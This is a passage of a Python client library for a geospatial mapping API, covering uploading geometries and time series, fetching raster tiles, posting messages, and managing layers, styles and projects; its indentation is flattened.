elif 'datetime' in str(features.dtypes[c]):
propertyType = 'datetime'
features[c] = [ d.strftime('%Y-%m-%d %H:%M:%S.%f')[:-3] for d in features[c].values ]
else:
propertyType = 'string'
features[c] = [ str(d) if d != None else np.nan for d in features[c].values ]
###date
addProperty(shapeId = mapId, layerId =layerId, propertyName = c, propertyType = propertyType, token = token)
indices = chunks(np.arange(features.shape[0]))
#add properties manually
addedIds = []
for i in np.arange(len(indices)):
indices_sub = indices[i]
features_sub = features.iloc[indices_sub]
features_sub =features_sub.to_json(na='drop')
features_sub = json.loads(features_sub)
#float to int
body = {"mapId": mapId, "layerId":layerId, "features":features_sub['features']}
if str(type(None)) != str(type(zoomlevels)):
body['zoomLevels'] = zoomlevels
retried = 0
while retried <= 20:
try:
r = s.post(url + '/geometry/add', headers = {"Authorization":token},
json = body )
retried = 21
except Exception as e:
if retried == 20:
raise ValueError(e)
retried = retried +1
time.sleep(1)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
addedIds = addedIds + r.json()
loadingBar(i*3000 + len(indices_sub),features.shape[0])
i = i+1
return(addedIds)
def messageGet(shapeId, layerId, userId= None, messageIds =None, geometryIds=None, limit = None, deleted=False, token = None):
body={'mapId':shapeId, 'layerId':layerId, 'deleted':deleted, 'returnType':'all'}
if str(type(userId)) != str(type(None)):
body['userId']=userId
if str(type(geometryIds)) != str(type(None)):
body['geometryIds']= list(geometryIds)
keepGoing = True
messages = []
while(keepGoing):
if str(type(limit)) == str(type(None)):
body['pageSize'] = 100
else:
body['pageSize'] = min(100, limit - len(messages))
if token == None:
r = s.post(url + '/message/get',
json = body )
else:
r = s.post(url + '/message/get', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
body['pageStart']=r['nextPageStart']
messages = messages + r['result']
if str(type(limit)) == str(type(None)):
keepGoing = str(type(r['nextPageStart'])) != str(type(None))
else:
keepGoing = len(messages) < limit or str(type(r['nextPageStart'])) != str(type(None))
loadingBar(len(messages), len(messages))
return(messages)
def messageAdd(shapeId, layerId, geometryId, token, replyTo = None, message = None, private= None, image=None, lon=None, lat=None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'geometryId':geometryId}
if str(type(lon)) != "<class 'NoneType'>":
lon = float(lon)
if str(type(lat)) != "<class 'NoneType'>":
lat = float(lat)
if str(type(replyTo)) != "<class 'NoneType'>":
body['replyTo'] = replyTo
if str(type(message)) != "<class 'NoneType'>":
body['text'] = message
if str(type(private)) != "<class 'NoneType'>":
body['private'] = private
if str(type(image)) != "<class 'NoneType'>":
image = Image.fromarray(image.astype('uint8'))
buffered = BytesIO()
image.save(buffered, format="JPEG")
img_str = str(base64.b64encode(buffered.getvalue()))
img_str = 'data:image/jpeg;base64,' + img_str[2:-1]
body['image'] = img_str
if str(type(lon)) != "<class 'NoneType'>":
body['x'] = lon
if str(type(lat)) != "<class 'NoneType'>":
body['y'] = lat
r = s.post(url + '/message/add', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
messageId = r.json()['id']
return({'id':messageId})
def messageDelete(shapeId, layerId, messageId, token):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'messageId':messageId}
r = s.post(url + '/message/delete', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def messageImage(shapeId, layerId, messageId, token = None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId, 'messageId':messageId}
if token ==None:
r = s.post(url + '/message/image',
json = body )
else:
r = s.post(url + '/message/image', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
try:
im = Image.open(BytesIO(r.content))
except:
raise ValueError('No image or invalid image in geoMessage')
return(im)
def rasterAggregated(mapId, timestamps, geometry, approximate = True, token = None):
sh = gpd.GeoDataFrame({'geometry':[geometry]})
geometry =sh.to_json(na='drop')
geometry = json.loads(geometry)
geometry = geometry['features'][0]['geometry']
timestamps = list(timestamps)
body = {'mapId':mapId, 'timestamps':timestamps, 'geometry':geometry, 'approximate':approximate}
if token ==None:
r = s.post(url + '/raster/aggregated',
json = body )
else:
r = s.post(url + '/raster/aggregated', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def rasterRaw(mapId, timestamp, xMin= None,xMax= None,yMin=None, yMax=None, zoom = None, num_bands = None, bounds=None, downsample = False, width = None, height = None, threads = 1, token = None):
dtype = 'float32'
if str(type(bounds)) != str(type(None)):
xMin,yMin,xMax,yMax = bounds.bounds
elif str(type(xMin)) == "<class 'NoneType'>" or str(type(xMax)) == "<class 'NoneType'>" or str(type(yMin)) == "<class 'NoneType'>" or str(type(yMax)) == "<class 'NoneType'>" :
raise ValueError('Either xMin, xMax, yMin and yMax or bounds are required')
xMin = float(xMin)
xMax = float(xMax)
yMin = float(yMin)
yMax = float(yMax)
xMinWeb,yMinWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMin, yMin)
xMaxWeb,yMaxWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMax, yMax)
timestamp = int(timestamp)
token_inurl = ''
if str(type(token)) != str(type(None)):
token_inurl = '?token=' + token.replace('Bearer ', '')
if downsample:
if str(type(width)) == str(type(None)) or str(type(height)) == str(type(None)):
raise ValueError('if downsample is true, width and height are required')
bbox = {'xMin':xMin, 'xMax':xMax, 'yMin':yMin , 'yMax':yMax}
        body = {'mapId':mapId, 'timestamp' : timestamp, 'bounds':bbox, 'width':width, 'height':height}
print(body)
if str(type(token)) == str(type(None)):
r = s.post(url + '/raster/raw',
json = body )
else:
r = s.post(url + '/raster/raw', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
else:
r_total = tifffile.imread(BytesIO(r.content))
r_total = np.transpose(r_total, [2,0,1])
else:
if str(type(num_bands)) == str(type(None)):
bands = metadata(mapId)['bands']
num_bands = len(bands)
if str(type(zoom)) == str(type(None)):
timestamps = metadata(mapId, token = token)['timestamps']
all_timestamps = [item["timestamp"] for item in timestamps]
if not timestamp in all_timestamps:
raise ValueError('given timestamp does not exist')
zoom = next(item for item in timestamps if item["timestamp"] == timestamp)['zoom']
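        # The next four lines apply the standard Web Mercator ("slippy map") tile
        # formulas, x = (lon + 180) / 360 * 2**zoom and
        # y = (1 - ln(tan(pi/4 + lat_rad/2)) / pi) * 2**(zoom - 1), with latitude
        # written here in degrees. The fractional values are kept so the exact
        # pixel window can be cropped out of the stitched tiles further down.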
min_x_osm_precise = (xMin +180 ) * 2**zoom / 360
max_x_osm_precise = (xMax +180 ) * 2**zoom / 360
max_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMin/360 * math.pi ) ) )
min_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMax/360 * math.pi ) ) )
min_x_osm = math.floor(min_x_osm_precise )
max_x_osm = math.floor( max_x_osm_precise)
max_y_osm = math.floor( max_y_osm_precise)
min_y_osm = math.floor( min_y_osm_precise)
x_tiles = np.arange(min_x_osm, max_x_osm+1)
y_tiles = np.arange(min_y_osm, max_y_osm +1)
r_total = np.zeros((256*(max_y_osm - min_y_osm + 1) ,256*(max_x_osm - min_x_osm + 1),num_bands), dtype = dtype)
tiles = []
for tileY in y_tiles:
for tileX in x_tiles:
tiles = tiles + [(tileX, tileY)]
def subTiles(tiles):
N = 0
for tile in tiles:
tileX = tile[0]
tileY = tile[1]
x_index = tileX - min_x_osm
y_index = tileY - min_y_osm
url_req = url + '/tileService/' + mapId + '/' + str(timestamp) + '/data/' + str(zoom) + '/' + str(tileX) + '/' + str(tileY) + token_inurl
r = s.get(url_req , timeout = 10 )
if int(str(r).split('[')[1].split(']')[0]) == 403:
raise ValueError('insufficient access')
if int(str(r).split('[')[1].split(']')[0]) != 200:
r = np.zeros((num_bands,256,256))
else:
r = tifffile.imread(BytesIO(r.content))
r = np.transpose(r, [1,2,0])
r_total[y_index*256:(y_index+1)*256,x_index*256:(x_index+1)*256, : ] = r
loadingBar(N, len(tiles))
N = N + 1
size = math.floor(len(tiles)/threads) + 1
tiles_chunks = chunks(tiles, size)
prs = []
for tiles in tiles_chunks:
pr = threading.Thread(target = subTiles, args =(tiles,), daemon=True)
pr.start()
prs = prs + [pr]
for pr in prs:
pr.join()
min_x_index = int(round((min_x_osm_precise - min_x_osm)*256))
max_x_index = max(int(round((max_x_osm_precise- min_x_osm)*256)), min_x_index + 1 )
min_y_index = int(round((min_y_osm_precise - min_y_osm)*256))
max_y_index = max(int(round((max_y_osm_precise- min_y_osm)*256)), min_y_index + 1)
r_total = r_total[min_y_index:max_y_index,min_x_index:max_x_index,:]
if str(type(bounds)) != str(type(None)):
trans = rasterio.transform.from_bounds(xMinWeb, yMinWeb, xMaxWeb, yMaxWeb, r_total.shape[1], r_total.shape[0])
shape = gpd.GeoDataFrame({'geometry':[bounds]})
shape.crs = {'init': 'epsg:4326'}
shape = shape.to_crs({'init': 'epsg:3857'})
raster_shape = rasterize( shapes = [ (shape['geometry'].values[m], 1) for m in np.arange(shape.shape[0]) ] , fill = 0, transform = trans, out_shape = (r_total.shape[0], r_total.shape[1]), all_touched = True )
r_total[:,:,-1] = np.minimum(r_total[:,:,-1], raster_shape)
return(r_total)
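# A minimal usage sketch for rasterRaw (the map id and bounding box below are
# hypothetical placeholders):
#
#   arr = rasterRaw('my-map-id', timestamp=0,
#                   xMin=4.00, xMax=4.05, yMin=52.00, yMax=52.05, token=token)
#   print(arr.shape)   # rows x columns x bands, float32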
def rasterVisual(mapId, timestamp, layerId, xMin= None,xMax= None,yMin=None, yMax=None, bounds=None, downsample = False, width = None, height=None, threads = 1, token = None):
dtype = 'uint8'
if str(type(bounds)) != str(type(None)):
xMin,yMin,xMax,yMax = bounds.bounds
elif str(type(xMin)) == "<class 'NoneType'>" or str(type(xMax)) == "<class 'NoneType'>" or str(type(yMin)) == "<class 'NoneType'>" or str(type(yMax)) == "<class 'NoneType'>" :
raise ValueError('Either xMin, xMax, yMin and yMax or bounds are required')
xMin = float(xMin)
xMax = float(xMax)
yMin = float(yMin)
yMax = float(yMax)
xMinWeb,yMinWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMin, yMin)
xMaxWeb,yMaxWeb = transform(Proj(init='epsg:4326'), Proj(init='epsg:3857'), xMax, yMax)
timestamp = int(timestamp)
token_inurl = ''
if token != None:
token_inurl = '?token=' + token.replace('Bearer ', '')
if downsample:
if str(type(width)) == str(type(None)) or str(type(height)) == str(type(None)):
raise ValueError('if downsample is true, width and height are required')
bbox = {'xMin':xMin, 'xMax':xMax, 'yMin':yMin , 'yMax':yMax}
body = {'mapId':mapId, 'timestamp' : timestamp,'layerId':layerId, 'mapId':mapId, 'bounds':bbox, 'width':width, 'height':height}
if str(type(token)) == str(type(None)):
r = s.post(url + '/raster/bounds',
json = body )
else:
r = s.post(url + '/raster/bounds', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
else:
r_total = np.array(Image.open(BytesIO(r.content)), dtype = 'uint8')
else:
timestamps = metadata(mapId, token = token)['timestamps']
zoom = next(item for item in timestamps if item["timestamp"] == timestamp)['zoom']
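        # Convert the WGS84 bounding box to fractional slippy-map (OSM) tile indices at this
        # zoom level: x = (lon + 180) / 360 * 2**zoom, and y follows from the Web Mercator
        # latitude formula below; flooring these gives the integer tile numbers to request.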
min_x_osm_precise = (xMin +180 ) * 2**zoom / 360
max_x_osm_precise = (xMax +180 ) * 2**zoom / 360
max_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMin/360 * math.pi ) ) )
min_y_osm_precise = 2**zoom / (2* math.pi) * ( math.pi - math.log( math.tan(math.pi / 4 + yMax/360 * math.pi ) ) )
min_x_osm = math.floor(min_x_osm_precise )
max_x_osm = math.floor( max_x_osm_precise)
max_y_osm = math.floor( max_y_osm_precise)
min_y_osm = math.floor( min_y_osm_precise)
x_tiles = np.arange(min_x_osm, max_x_osm+1)
y_tiles = np.arange(min_y_osm, max_y_osm +1)
tiles = []
for tileY in y_tiles:
for tileX in x_tiles:
tiles = tiles + [(tileX,tileY)]
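        # Fetch the tiles concurrently: the tile list is split into `threads` chunks below and
        # each worker thread pastes its decoded 256x256 tiles directly into the shared r_total mosaic.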
def subTiles(tiles):
N=0
for tile in tiles:
tileX = tile[0]
tileY = tile[1]
x_index = tileX - min_x_osm
y_index = tileY - min_y_osm
r = s.get(url + '/tileService/' + mapId + '/' + str(timestamp) + '/' + layerId + '/' + str(zoom) + '/' + str(tileX) + '/' + str(tileY) + token_inurl ,
timeout = 10 )
if int(str(r).split('[')[1].split(']')[0]) != 200:
r = np.zeros((256,256,4))
else:
r = np.array(Image.open(BytesIO(r.content)), dtype = 'uint8')
r_total[y_index*256:(y_index+1)*256,x_index*256:(x_index+1)*256, : ] = r
loadingBar(N, len(tiles))
N = N+1
r_total = np.zeros((256*(max_y_osm - min_y_osm + 1) ,256*(max_x_osm - min_x_osm + 1),4), dtype = dtype)
size = math.floor(len(tiles)/threads) + 1
tiles_chunks = chunks(tiles, size)
prs = []
for tiles in tiles_chunks:
pr = threading.Thread(target = subTiles, args =(tiles,), daemon=True)
pr.start()
prs = prs + [pr]
for pr in prs:
pr.join()
min_x_index = int(round((min_x_osm_precise - min_x_osm)*256))
max_x_index = int(round((max_x_osm_precise- min_x_osm)*256))
min_y_index = int(round((min_y_osm_precise - min_y_osm)*256))
max_y_index = int(round((max_y_osm_precise- min_y_osm)*256))
r_total = r_total[min_y_index:max_y_index,min_x_index:max_x_index,:]
if str(type(bounds)) != str(type(None)):
trans = rasterio.transform.from_bounds(xMinWeb, yMinWeb, xMaxWeb, yMaxWeb, r_total.shape[1], r_total.shape[0])
shape = gpd.GeoDataFrame({'geometry':[bounds]})
shape.crs = {'init': 'epsg:4326'}
shape = shape.to_crs({'init': 'epsg:3857'})
raster_shape = rasterize( shapes = [ (shape['geometry'].values[m], 1) for m in np.arange(shape.shape[0]) ] , fill = 0, transform = trans, out_shape = (r_total.shape[0], r_total.shape[1]), all_touched = True )
r_total[:,:,-1] = np.minimum(r_total[:,:,-1], raster_shape)
r_total = r_total.astype('uint8')
r_total = Image.fromarray(r_total)
return(r_total)
def seriesAdd(shapeId, layerId, geometryId, data, token, includeDatetime = True):
data = data.copy()
mapId = shapeId
if not 'datetime' in data.columns and includeDatetime:
        raise ValueError('Dataframe has no datetime column. To upload data without a date and time, use includeDatetime = False; in that case the server will use the current datetime.')
if 'datetime' in data.columns:
includeDatetime = True
if str(data['datetime'].dtypes) == 'datetime64[ns]':
data['datetime'] = data['datetime'].dt.strftime('%Y-%m-%d %H:%M:%S')
dates = list(data['datetime'])
del data['datetime']
else:
raise ValueError('datetime column must be of type datetime')
for c in data.columns:
data[c] = data[c].astype(float)
values = []
for i in np.arange(data.shape[0]):
for c in data.columns:
value = data[c].values[i]
if not np.isnan(value):
if includeDatetime:
values = values + [{'property':c, 'value':data[c].values[i], 'date':dates[i]}]
else:
values = values + [{'property':c, 'value':data[c].values[i]}]
chunks_values = chunks(values)
N = 0
for values_sub in chunks_values:
body = {"mapId": mapId, "values":values_sub, 'layerId':layerId, 'geometryId':geometryId}
r = s.post(url + '/series/add', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
loadingBar(N*3000 + len(values_sub), len(values))
N = N+1
def seriesDelete(shapeId, layerId, geometryId, seriesIds, token, revert = False):
body = {'mapId':shapeId, 'layerId':layerId, 'geometryId':geometryId, 'seriesIds':list(seriesIds), 'revert':revert}
r = s.post(url + '/series/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def seriesChangelog(shapeId, layerId, geometryId, limit = 100, userId = None, pageStart = None, actions = ['add', 'delete', 'revert'], token = None):
changes = []
keepGoing = True
while keepGoing:
pageSize = min(100, limit - len(changes))
body = {'mapId':shapeId, 'layerId':layerId, 'geometryId':geometryId, 'pageSize':pageSize, 'actions':list(actions)}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(pageStart)) != str(type(None)):
body['pageStart'] = pageStart
if token ==None:
r = s.post(url + '/series/changelog',
json = body )
else:
r = s.post(url + '/series/changelog', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
r = r['result']
changes = changes + r
if len(changes) >= limit or str(type(pageStart)) == str(type(None)):
break
return(changes)
def seriesInfo(shapeId, layerId, geometryId = None, token = None):
mapId = shapeId
body = {'mapId':mapId, 'layerId':layerId}
if str(type(geometryId)) != str(type(None)):
body['geometryId'] = geometryId
if token ==None:
r = s.post(url + '/series/info',
json = body )
else:
r = s.post(url + '/series/info', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
r['dateMin'] = datetime.strptime(r['dateMin'], "%Y-%m-%d %H:%M:%S")
r['dateMax'] = datetime.strptime(r['dateMax'], "%Y-%m-%d %H:%M:%S")
return(r)
def seriesGet(shapeId, layerId, geometryId, propertyName = None, dateFrom = None, dateTo = None, pageStart = None, userId=None, limit = None, token = None):
mapId = shapeId
body = {'mapId':mapId, 'geometryId':geometryId, 'returnType':'json', 'layerId':layerId}
    if str(type(pageStart)) != str(type(None)) and str(type(dateFrom)) != str(type(None)):
        raise ValueError('cannot define pageStart together with dateFrom')
if str(type(dateFrom)) != str(type(None)):
if str(type(dateFrom)) == "<class 'datetime.datetime'>":
dateFrom = dateFrom.strftime('%Y-%m-%d %H:%M:%S')
pageStart = {'dateFrom':dateFrom}
if str(type(userId)) != str(type(None)):
body['userId'] = userId
if str(type(dateTo)) != str(type(None)):
if str(type(dateTo)) == "<class 'datetime.datetime'>":
dateTo = dateTo.strftime('%Y-%m-%d %H:%M:%S')
body['dateTo'] = dateTo
if str(type(propertyName)) != str(type(None)):
body['property'] = propertyName
keepGoing = True
series = []
while keepGoing:
if(str(type(pageStart)) != str(type(None))):
body['pageStart'] = pageStart
if(str(type(limit)) != str(type(None))):
body['limit'] = min(5000, limit - len(series))
if token ==None:
r = s.post(url + '/series/get',
json = body )
else:
r = s.post(url + '/series/get', headers = {"Authorization":token},
json = body )
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
pageStart = r['nextPageStart']
series = series + r['result']
        if str(type(limit)) != str(type(None)) and len(series) >= limit:
keepGoing = False
if str(type(pageStart)) == str(type(None)):
keepGoing = False
series = [ { 'id':k['id'], 'property': k['property'], 'value': k['value'], 'date': datetime.strptime(k['date'], "%Y-%m-%dT%H:%M:%S.%fZ") } for k in series]
series = pd.DataFrame(series)
return(series)
################################################up and downloads
def addTimestamp(mapId, startDate, token, endDate = None, bounds=None):
if str(type(endDate)) == str(type(None)):
endDate = startDate
if str(type(startDate)) != "<class 'datetime.datetime'>":
        raise ValueError('startDate must be of type datetime.datetime')
if str(type(endDate)) != "<class 'datetime.datetime'>":
        raise ValueError('endDate must be of type datetime.datetime')
startDate = startDate.strftime("%Y-%m-%dT%H:%M:%S.%f")
endDate = endDate.strftime("%Y-%m-%dT%H:%M:%S.%f")
toAdd = {'dateFrom':startDate, 'dateTo':endDate}
if str(type(bounds)) != str(type(None)):
boundary = gpd.GeoSeries([bounds]).__geo_interface__['features'][0]
boundary = boundary['geometry']
toAdd['bounds'] = boundary
body = {"mapId": mapId, "toAdd":[toAdd]}
r = s.post(url + '/settings/projects/reschedule', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()[0]
return({'id':r})
def activateTimestamp(mapId, timestampId, active, token):
toActivate = []
toDeactivate = []
if active:
toActivate = [timestampId]
else:
toDeactivate = [timestampId]
body = {'mapId':mapId, 'toActivate': toActivate, 'toDeactivate': toDeactivate}
r = s.post(url + '/settings/projects/reschedule', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def removeTimestamp(mapId, timestampNumber, token, revert = False, hard = False):
r = s.post(url + '/settings/projects/deleteTimestamp', headers = {"Authorization":token},
json = {"mapId": mapId, "timestamp":timestampNumber, 'revert':revert, 'hard':hard})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def getGeometryUploads(shapeId, layerId, token):
body = {'mapId':shapeId, 'layerId': layerId}
r = s.post(url + '/files/geometry/getUploads', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def uploadRasterFile(mapId, timestampId, file, token, fileFormat = 'tif', epsg = None):
if not os.path.exists(file):
raise ValueError( file + ' not found')
    fileName = os.path.basename(file)
    conn_file = open(file, 'rb')
    fields = {'timestampId': timestampId, 'mapId':mapId, 'format':fileFormat, 'fileName':fileName, 'upload': (fileName, conn_file, 'application/octet-stream')}
    if str(type(epsg)) != str(type(None)):
        fields['epsg'] = str(epsg)
    payload = MultipartEncoder(fields = fields)
r = s.post(url + '/files/raster/upload', headers = {"Authorization":token, "Content-Type": payload.content_type}, data=payload)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
conn_file.close()
def addShapeLayer(shapeId, layerName, token, color = "#fcba033f"):
mapId = shapeId
r = s.post(url + '/settings/geometryLayers/add', headers = {"Authorization":token},
json = {"mapId": mapId, "color":color, "layerName":layerName, "properties":[] })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def removeShapeLayer(shapeId, layerId, token, revert = False):
mapId = shapeId
r = s.post(url + '/settings/geometryLayers/delete', headers = {"Authorization":token},
json = {"mapId": mapId, "layerId":layerId, "revert": revert })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def uploadGeometryFile(shapeId, layerId, file, fileFormat, token, epsg=None):
mapId = shapeId
if not os.path.exists(file):
raise ValueError( file + ' not found')
    fileName = os.path.basename(file)
    conn_file = open(file, 'rb')
    fields = {"mapId": mapId, 'layerId':layerId, 'fileName':fileName, 'format':fileFormat, 'upload': (fileName, conn_file, 'application/octet-stream') }
    if str(type(epsg)) != str(type(None)):
        fields['epsg'] = str(int(epsg))
    payload = MultipartEncoder(fields = fields)
r = s.post(url + '/files/geometry/upload' , headers = {"Authorization":token, "Content-Type": payload.content_type}, data=payload)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
conn_file.close()
def addProperty(shapeId, layerId, propertyName, propertyType, token, private=False, required=False):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId, 'propertyName': propertyName, 'type':propertyType, 'private':private, 'required':required }
r = s.post(url + '/settings/geometryLayers/addProperty', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def deleteProperty(shapeId, layerId, propertyName, token, revert = False):
mapId = shapeId
body = {"mapId": mapId, 'layerId':layerId, 'propertyName': propertyName, 'revert':revert }
r = s.post(url + '/settings/geometryLayers/deleteProperty', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def ShapeLayerIndex(shapeId, layerId, token, filterProperties = [], idProperty = None):
if type(filterProperties) != type([]):
raise ValueError('filterProperties must be a list with property names')
toAdd = [ {'property': p, 'id':False } for p in filterProperties]
    if str(type(idProperty)) != str(type(None)):
toAdd = toAdd + [{'property':idProperty, 'id':True}]
body = {"mapId":shapeId,"layerId":layerId, 'properties':toAdd}
r = s.post(url + '/settings/geometryLayers/reIndex', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def shapeLayerAddStyle(shapeId, layerId, styleName, rules, token, isDefault=False):
rules_new = []
for rule in rules:
value = rule['value']
if 'float' in str(type(value)):
value = float(value)
elif 'int' in str(type(value)):
value = int(value)
elif 'str' in str(type(value)):
value = str(value)
elif 'bool' in str(type(value)):
value = bool(value)
else:
            raise ValueError('value must be a float, int, string or bool')
rules_new = rules_new + [ {'property': str(rule['property']) , 'value': value , 'operator': str(rule['operator']) , 'color': str(rule['color']) } ]
body = {'mapId':shapeId, 'layerId': layerId, 'rules':rules_new, 'styleName':styleName, 'isDefault':isDefault }
r = s.post(url + '/settings/geometryLayers/addStyle', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r= r.json()
return(r)
def shapeLayerRemoveStyle(shapeId, layerId, styleId, token):
body = {'mapId':shapeId, 'layerId': layerId, 'styleId':styleId}
r = s.post(url + '/settings/geometryLayers/removeStyle', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def mapVisualisationAdd(mapId, name, method , bands, parameters, token):
parameter = json.loads(json.dumps(parameters))
body = {'mapId': mapId, 'name':name, 'method':method, 'bands':list(bands), 'overwrite':False, 'parameters':parameter}
r = s.post(url + '/settings/mapLayers/add', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
return(r.json())
def mapVisualisationRemove(mapId, layerId, token):
body = {'mapId': mapId, 'layerId':layerId}
r = s.post(url + '/settings/mapLayers/delete', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
############################new projects
def newShape(name, token):
r = s.post(url + '/settings/projects/newShape', headers = {"Authorization":token},
json = {"name": name})
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def updateBounds(shapeId, token, boundary):
boundary = gpd.GeoSeries([boundary]).__geo_interface__['features'][0]
boundary = boundary['geometry']
body = {"mapId": shapeId, 'bounds':boundary}
r = s.post(url + '/settings/projects/newBounds', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def newMap(name, token):
body = {'name':name}
r = s.post(url + '/settings/projects/newMap', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def newOrder(name, token, dataSource = 'sentinel2RGBIR' ):
body = {'name':name, 'dataSource':{'name':dataSource}}
r = s.post(url + '/settings/projects/newMap', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
r = r.json()
return(r)
def projectProperties(projectId, properties, token):
mapId = projectId
body = {'mapId':mapId, 'properties':properties}
r = s.post(url + '/settings/organize/properties', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectAddHashtag(projectId, hashtag, token):
mapId = projectId
body = {'mapId':mapId, 'hashtag':hashtag}
r = s.post(url + '/settings/organize/addHashtag', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectRemoveHashtag(projectId, hashtag, token):
mapId = projectId
body = {'mapId':mapId, 'hashtag':hashtag}
r = s.post(url + '/settings/organize/removeHashtag', headers = {"Authorization":token},
json = body)
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
def projectDescription(projectId, description, token):
r = s.post(url + '/settings/organize/description', headers = {"Authorization":token},
json = {'mapId':projectId, 'description':description })
if int(str(r).split('[')[1].split(']')[0]) != 200:
raise ValueError(r.text)
##################################################################################################################
def plotPolys(polys, xMin = None,xMax = None,yMin=None,yMax= None, alpha = None, image = None, colors = {0:(0,0,255)} , column= None):
polys.crs = {'init': 'epsg:4326'}
if str(type(xMin)) == str(type(None)):
polys_union = polys.unary_union
bbox = gpd.GeoDataFrame({'geometry':[polys_union]})
xMin = bbox.bounds['minx'].values[0]
yMin = bbox.bounds['miny'].values[0]
xMax = bbox.bounds['maxx'].values[0]
yMax = bbox.bounds['maxy'].values[0]
bbox = gpd.GeoDataFrame( {'geometry': [Polygon([(xMin,yMin), (xMax, yMin), (xMax, yMax), (xMin, yMax)])]} )
bbox.crs = {'init': 'epsg:4326'}
bbox = bbox.to_crs({'init': 'epsg:3785'})
polys = polys.to_crs({'init': 'epsg:3785'})
if str(type(image)) == "<class 'NoneType'>":
if (xMax-xMin) > (yMax - yMin):
image = np.zeros((1024,1024* int((xMax-xMin)/(yMax-yMin)),4))
else:
image = np.zeros((1024* int((yMax-yMin)/(xMax-xMin)),1024,4))
image = image/255
if column == None:
column = 'extra'
polys[column] = 0
transform = rasterio.transform.from_bounds(bbox.bounds['minx'], bbox.bounds['miny'], bbox.bounds['maxx'], bbox.bounds['maxy'], image.shape[1], image.shape[0])
rasters = np.zeros(image.shape)
for key in colors.keys():
sub_polys = polys.loc[polys[column] == key]
if sub_polys.shape[0] >0:
raster = rasterize( shapes = [ (sub_polys['geometry'].values[m], 1) for m in np.arange(sub_polys.shape[0]) ] , fill = 0, transform = transform, out_shape = (image.shape[0], image.shape[1]), all_touched = True )
raster = np.stack([raster * colors[key][0]/255, raster*colors[key][1]/255,raster*colors[key][2]/255, raster ], axis = 2)
rasters = np.add(rasters, raster)
rasters = np.clip(rasters, 0,1)
image_out = rasters
image_out[image_out[:,:,3] == 0, :] = image [image_out[:,:,3] == 0, :]
if alpha != None:
image_out = image * (1 - alpha) + image_out*alpha
